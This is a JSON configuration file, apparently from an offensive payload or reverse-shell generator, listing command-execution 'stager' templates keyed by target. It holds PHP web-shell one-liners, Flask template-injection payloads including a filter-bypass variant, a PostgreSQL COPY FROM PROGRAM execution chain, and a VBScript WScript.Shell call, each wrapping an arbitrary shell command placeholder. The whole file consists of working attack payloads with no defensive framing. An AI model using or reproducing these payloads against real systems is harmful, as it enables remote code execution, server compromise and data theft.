stagers.json
{
"pss": {
"direct": {
"payload": "<<SHELL>>"
}
},
"php": {
"exec": {
"payload": "<?php exec(\"<<SHELL>>\"); ?>"
},
"passthru": {
"payload": "<?php passthru(\"<<SHELL>>\"); ?>"
},
"popen": {
"payload": "<?php popen(\"<<SHELL>>\", \"r\"); ?>"
},
"shell_exec": {
"payload": "<?php shell_exec(\"<<SHELL>>\"); ?>"
},
"singleqoute": {
"payload": "<?php `<<SHELL>>`; ?>"
},
"system": {
"payload": "<?php system(\"<<SHELL>>\"); ?>"
}
},
"flask": {
"ssti-os-system": {
"payload": "{{ self.__init__.__globals__.__builtins__.__import__(\"os\").system(\"<<SHELL>>\") }}"
},
"ssti-os-popen": {
"payload": "{{ self.__init__.__globals__.__builtins__.__import__(\"os\").popen(\"<<SHELL>>\").read() }}"
},
"ssti-os-popen-filter-bypass-join": {
"payload": "{{request|attr(\"application\")|attr([\"_\"*2,\"globals\",\"_\"*2]|join)|attr([\"_\"*2,\"getitem\",\"_\"*2]|join)([\"_\"*2,\"builtins\",\"_\"*2]|join)|attr([\"_\"*2,\"getitem\",\"_\"*2]|join)([\"_\"*2,\"import\",\"_\"*2]|join)(\"os\")|attr(\"popen\")(\"<<SHELL>>\")|attr(\"read\")()}}"
}
},
"postgresql": {
"cmd_exec": {
"payload": "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM '<<SHELL>>'; SELECT * FROM cmd_exec; DROP TABLE IF EXISTS cmd_exec;"
}
},
"vbscript": {
"cmd_exec": {
"payload": "CreateObject(\"WScript.Shell\").Run(\"<<SHELL>>\")"
}
}
}